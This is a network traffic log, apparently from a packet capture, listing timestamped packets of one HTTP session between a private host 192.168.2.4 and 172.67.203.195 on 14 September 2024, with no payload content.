Sep 14, 2024 18:31:08.727593899 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727622986 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.727627993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727663040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727682114 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.727713108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727746964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727766991 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.727797985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727832079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727850914 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.727864027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727899075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727919102 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.727947950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.727982044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728004932 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.728014946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728049040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728065968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.728081942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728136063 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.728164911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728198051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728247881 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728255987 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.728281021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728313923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728338003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.728348017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728399038 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.728399992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728435040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728467941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728492022 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.728517056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728549957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728565931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728602886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728652954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728687048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728694916 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.728719950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728732109 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.728760004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728780031 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.728791952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728832960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728846073 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.728863001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728894949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728930950 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.728950024 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.728997946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729006052 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.729032040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729064941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729090929 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.729099035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729131937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729157925 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.729182959 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729214907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729238033 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.729248047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729279041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729300976 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.729311943 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729363918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729372978 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.729398966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729432106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729459047 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.729464054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729515076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729516983 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.729552031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729584932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729605913 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.729618073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729650021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729672909 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.729684114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729716063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729736090 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.729749918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729784012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729803085 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.729820013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729846954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.729876041 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.731287956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.731375933 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.731513977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.731547117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.731600046 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.731869936 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.731924057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.731976986 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.732209921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.732352972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.732480049 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.770530939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.770544052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.770555019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.770564079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.770575047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.770585060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.770597935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.770607948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.770651102 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.770783901 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.813906908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814078093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814090967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814248085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814258099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814269066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814270973 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.814279079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814291954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814383984 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.814409971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814419985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814428091 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.814433098 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814448118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814491987 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.814526081 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.814579010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814595938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814646959 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.814904928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814924002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814935923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814946890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.814971924 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.815004110 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.815066099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815078020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815088034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815098047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815109015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815120935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815151930 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.815184116 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.815248013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815259933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815305948 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.815392971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815402985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815414906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815423012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815433025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815454006 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.815490007 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.815576077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815587044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815598011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815629959 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.815660954 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.815732956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815743923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815754890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815764904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815776110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815785885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815788031 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.815825939 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.815850973 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.815893888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815911055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815921068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815931082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815939903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815951109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815958977 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.815962076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815973997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815983057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.815992117 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.815994978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816031933 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816051006 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816057920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816075087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816085100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816096067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816106081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816116095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816127062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816128016 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816138029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816148996 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816149950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816164017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816173077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816183090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816188097 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816194057 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816220045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816229105 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816236973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816247940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816251993 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816268921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816271067 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816281080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816292048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816303015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816309929 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816312075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816323042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816332102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816340923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816350937 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816351891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816373110 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816378117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816394091 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816395044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816406965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816416979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816426039 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816436052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816437960 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816447020 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816458941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816468954 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816477060 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816478014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816488981 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816499949 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816500902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816512108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816519022 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816523075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816534996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816540003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816555023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816562891 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816570997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816582918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816585064 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816595078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816605091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816615105 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816625118 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816627026 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816634893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816648006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816657066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816668034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816668034 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816678047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816687107 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816692114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816703081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816713095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816719055 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816724062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.816741943 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.816786051 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.818376064 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.857100010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.857120991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.857131958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.857151031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.857161999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.857172012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.857182980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.857656956 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.899789095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.899801970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.899811983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.899867058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.899877071 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.899887085 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.899897099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.899905920 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.899913073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.899983883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.899996042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900008917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900021076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900028944 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.900055885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900060892 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.900068045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900080919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900119066 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.900151968 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.900537968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900763988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900773048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900782108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900793076 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900809050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900820971 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900830984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900904894 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.900921106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900932074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900949001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.900959015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900969982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.900974989 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.900986910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901017904 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.901062965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901073933 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901087046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901094913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901117086 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.901149035 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.901206017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901217937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901232004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901262045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.901293039 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.901329041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901340008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901350021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901360035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901372910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901381969 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901386976 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.901417971 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.901449919 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.901469946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901480913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901492119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.901501894 CEST	80	49738	172.67.203.195	192.168.2.4
